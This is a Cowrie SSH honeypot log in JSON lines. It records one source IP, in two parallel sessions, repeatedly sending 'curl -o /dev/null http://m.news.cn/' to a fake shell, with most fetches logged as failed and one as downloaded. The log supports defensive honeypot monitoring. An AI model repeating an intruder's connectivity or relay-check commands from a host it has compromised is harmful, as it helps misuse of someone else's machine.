{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.048229Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.049944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.052569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.053690Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.056700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.057586Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.095146Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.096718Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.101150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.102352Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.105358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.106632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.138734Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.140365Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.151114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.152592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.156201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.157324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.185217Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.187022Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.196650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.198280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.202820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.204664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.210048Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.245069Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.246017Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.249704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.250620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.253213Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.254835Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.289383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.290679Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.293171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.294142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.295467Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.296972Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.331529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.332795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.335063Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.336178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.373517Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.374875Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.377075Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.378350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.413427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.414874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.419857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.421070Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.452554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.453896Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.459440Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.460637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.486027Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.487208Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.490621Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.491839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.499902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.501095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.532399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.533817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.538518Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.539809Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.546827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.548095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.575672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.576878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.587355Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.588736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.591059Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.593100Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.611465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.612639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.624993Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.626126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.674200Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.676501Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.686806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.687937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.725633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.758167Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.769300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.770539Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.797753Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.811649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.812995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.841161Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.853578Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.855186Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.883674Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.885497Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.891164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.892270Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.937070Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.939259Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:08.999729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.000890Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.008835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.009956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.021499Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.022750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.039136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.040329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.051263Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.059639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.060827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.074508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.076072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.084636Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.086438Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.098935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.100156Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.113115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.114223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.144288Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.146284Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.153549Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.154636Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.170700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.171766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.199811Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.218072Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.219279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.232677Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.235542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.251298Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.253887Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
